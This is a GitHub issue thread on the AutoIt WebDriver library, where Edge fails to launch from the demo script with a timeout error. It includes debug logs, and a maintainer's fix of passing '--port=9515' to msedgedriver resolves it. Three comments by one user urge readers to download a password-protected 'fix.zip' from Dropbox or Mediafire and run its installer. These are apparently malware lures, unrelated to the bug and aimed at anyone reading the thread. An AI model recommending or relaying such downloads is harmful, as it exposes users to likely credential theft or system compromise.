### ISSUE TITLE
Edge Webdriver Exception [10]

### ISSUE THREAD

**Issue by Weslide** [Danp2/au3WebDriver#518]
## Bug report
No window displayed of Edge however it is reporting an error message of 10. timed out? when running the webdriver demo
Could be a json.au issue? updated everything I could to ensure the latest version however 

### How to reproduce
right click wd_demo.au3 and run script

1. Browser MSEdge
2. Debug: Full
3. ConsoleOut = WD_Console.log
4. DemoNavigation
5. click Run Demo!

### Expected behaviour
Expected to see edge browser open

### Log File
_WD_Option ==> Success [0] : Parameters:   Option=console   Value=D:\OSLP\Temp\WD_Console.log
_WD_Option ==> Success [0] : Parameters:   Option=errormsgbox   Value=False
_WD_Option ==> Success [0] : Parameters:   Option=OutputDebug   Value=False
_WD_GetBrowserPath ==> Success [0 / 3] : Parameters:    Browser=MSEdge
_WD_GetBrowserVersion ==> Success [0 / 3] : Parameters:    Browser=MSEdge
_WD_GetWebDriverVersion ==> Success [0 / 0] : Parameters:    Dir=D:\OSLP\Temp\    EXE=msedgedriver.exe
__WD_GetLatestWebdriverInfo ==> Success [0 / 0]
_WD_UpdateDriver ==> Success [0 / 0] : DriverCurrent = 128.0.2739.42 : DriverLatest = 128.0.2739.42
_WD_Option ==> Success [0] : Parameters:   Option=Driver   Value=msedgedriver.exe
_WD_Option ==> Success [0] : Parameters:   Option=Port   Value=9515
_WD_Option ==> Success [0] : Parameters:   Option=DriverParams   Value=--verbose --log-path="D:\OSLP\Temp\msedge.log"
_WD_CapabilitiesStartup: #150 : > {"capabilities":"{}"} > IsObj = 1
_WD_CapabilitiesAdd: #179 :      $key = alwaysMatch     $value1 = msedge     $value2 = 
_WD_CapabilitiesAdd: #207 :  $_WD_NOTATION__MATCHTYPE = [capabilities][alwaysMatch] $_WD_NOTATION__SPECIFICVENDOR = ["ms:edgeOptions"]
_WD_CapabilitiesAdd ==> Success [0] : Successfully used [alwaysMatch]  with specified browser: msedge
_WD_CapabilitiesAdd: #179 :      $key = excludeSwitches     $value1 = enable-automation     $value2 = 
_WD_CapabilitiesAdd: #241 #277 :      $key = excludeSwitches     $value1 = enable-automation     $value2 =     $s_Notation = [capabilities][alwaysMatch]["ms:edgeOptions"]["excludeSwitches"][0]   <<<<  enable-automation
_WD_CapabilitiesAdd ==> Success [0] : Successfully added capability
_WD_CapabilitiesDump: JSON structure starts below: 1262
{
    "capabilities":{
        "alwaysMatch":{
            "ms:edgeOptions":{
                "excludeSwitches":[
                    "enable-automation"
                ]
            }
        }
    }
}
_WD_CapabilitiesDump: JSON structure ends above.
_WD_GetFreePort ==> Success [0 / 9515] : Parameters:   MinPort=9515   MaxPort=Default
_WD_IsLatestRelease ==> Success [0] : True
_WD_Startup: OS:	WIN_10 X64 19045 
_WD_Startup: AutoIt:	3.3.16.1
_WD_Startup: Webdriver UDF:	1.3.1 (Up to date)
_WD_Startup: WinHTTP:	1.6.4.2
_WD_Startup: Driver:	msedgedriver.exe (64 Bit)
_WD_Startup: Params:	--verbose --log-path="D:\OSLP\Temp\msedge.log"
_WD_Startup: Port:	9515
_WD_Startup: Command:	"msedgedriver.exe" --verbose --log-path="D:\OSLP\Temp\msedge.log" 
_WD_Startup ==> Success [0]
__WD_Post: URL=HTTP://127.0.0.1:9515/session; Data={
    "capabilities":{
        "alwaysMatch":{
            "ms:edgeOptions":{
                "excludeSwitches":[
                    "enable-automation"
                ]
            }
        }
    }
}
__WD_Post ==> Send / Recv error [6] : HTTP status = 0 ResponseText=WinHTTP request timed out before Webdriver
_WD_CreateSession ==> Webdriver Exception [10]
_WD_GetSession ==> Success [0]

msedge.log;
[1724636608.372][INFO]: Starting Microsoft Edge WebDriver 128.0.2739.42 (e015505d79c9432c75e2a9131c445776c61af592) on port 0
[1724636608.372][INFO]: Please see https://aka.ms/WebDriverSecurity for suggestions on keeping Microsoft Edge WebDriver safe.
[1724636608.404][INFO]: msedgedriver was started successfully on port 49394

Json.au3 info:
; ============================================================================================================================
; File		: Json.au3 (2021.11.20)
; Purpose	: A Non-Strict JavaScript Object Notation (JSON) Parser UDF
; Author	: Ward
; Dependency: BinaryCall.au3
; Website	: http://www.json.org/index.html
;
; Source	: jsmn.c
; Author	: zserge
; Website	: http://zserge.com/jsmn.html
;
; Source	: json_string_encode.c, json_string_decode.c
; Author	: Ward
;             Jos - Added Json_Dump()
;             TheXMan - Json_ObjGetItems and some Json_Dump Fixes.
;             Jos - Changed Json_ObjGet() and Json_ObjExists() to allow for multilevel object in string.
; ============================================================================================================================

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mlipok** [comment]
Interestning.
I got
```
>"Z:\AutoItPortable\App\SciTE\..\AutoIt3.exe" "Z:\!!!_SVN_AU3\UDF_Forum\Other_Members\Official_AutoIt_Forum\WebDriver\wd_demo.au3" /ErrorStdOut /UserParams    
> UpdateResult = True
> wd_demo.au3: _WD_Startup
> wd_demo.au3: _WD_CreateSession
! Error = 15 occurred on: Demo
! _WD_LastHTTPResult = 500
! _WD_LastHTTPResponse = {"value":{"error":"session not created","message":"session not created: Microsoft Edge failed to start: crashed.\n  (session not created: DevToolsActivePort file doesn't exist)\n  (The process started from msedge location C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe is no longer running, so msedgedriver is assuming that msedge has crashed.)","stacktrace":"\tGetHandleVerifier [0x013508F3+230755]\n\tMicrosoft::Applications::Events::time_ticks_t::time_ticks_t [0x01228771+402193]\n\tMicrosoft::Applications::Events::ILogConfiguration::operator* [0x01038AD0+3568]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x0105F128+53976]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x0105A71C+35020]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x0108B243+234483]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x0108AB3C+232684]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x010816B6+194662]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x01064F83+78131]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x01063F65+74005]\n\tMicrosoft::Applications::Events::GUID_t::GUID_t [0x0106498D+76605]\n\tGetHandleVerifier [0x01444A7C+1230572]\n\tMicrosoft::Applications::Events::FromJSON [0x01516522+132146]\n\tMicrosoft::Applications::Events::FromJSON [0x01515EA7+130487]\n\tMicrosoft::Applications::Events::FromJSON [0x0150ADE0+85232]\n\tMicrosoft::Applications::Events::FromJSON [0x01516EFB+134667]\n\tMicrosoft::Applications::Events::time_ticks_t::time_ticks_t [0x0123B6BF+479839]\n\tMicrosoft::Applications::Events::time_ticks_t::time_ticks_t [0x012311E8+437640]\n\tMicrosoft::Applications::Events::time_ticks_t::time_ticks_t [0x0123135B+438011]\n\tMicrosoft::Applications::Events::time_ticks_t::time_ticks_t [0x0121B9C4+349540]\n\tBaseThreadInitThunk [0x75797BA9+25]\n\tRtlInitializeExceptionChain [0x76F4C10B+107]\n\tRtlClearBits [0x76F4C08F+191]\n"}}
! _WD_GetSession = 
```
and finally Edge starts but scritps ends with error.

**Comment by mlipok** [comment]
Please check with :
```autoit
Func SetupEdge($bHeadless)
	_WD_Option('Driver', 'msedgedriver.exe')
	_WD_Option('Port', 9515)
	_WD_Option('DriverParams', '--port=9515 --verbose --log-path="' & @ScriptDir & '\msedge.log"')

;~ 	Local $sCapabilities = '{"capabilities": {"alwaysMatch": {"ms:edgeOptions": {"excludeSwitches": [ "enable-automation"]}}}}'
	_WD_CapabilitiesStartup()
	_WD_CapabilitiesAdd('alwaysMatch', 'msedge')
	_WD_CapabilitiesAdd('excludeSwitches', 'enable-automation')
	If $bHeadless Then _WD_CapabilitiesAdd('args', '--headless')
	_WD_CapabilitiesDump(@ScriptLineNumber) ; dump current Capabilities setting to console - only for testing in this demo
	Local $sCapabilities = _WD_CapabilitiesGet()
	Return $sCapabilities
EndFunc   ;==>SetupEdge

```

**Comment by mlipok** [comment]
It is releated to:
https://www.autoitscript.com/forum/topic/212201-chromedriver-issues-august-2024/?do=findComment&comment=1536305

**Comment by Weslide** [comment]
Adding in that additional --port=9515 seems to have worked. thank you very much.
Very strange...

**Comment by mlipok** [comment]
https://github.com/Danp2/au3WebDriver/pull/519
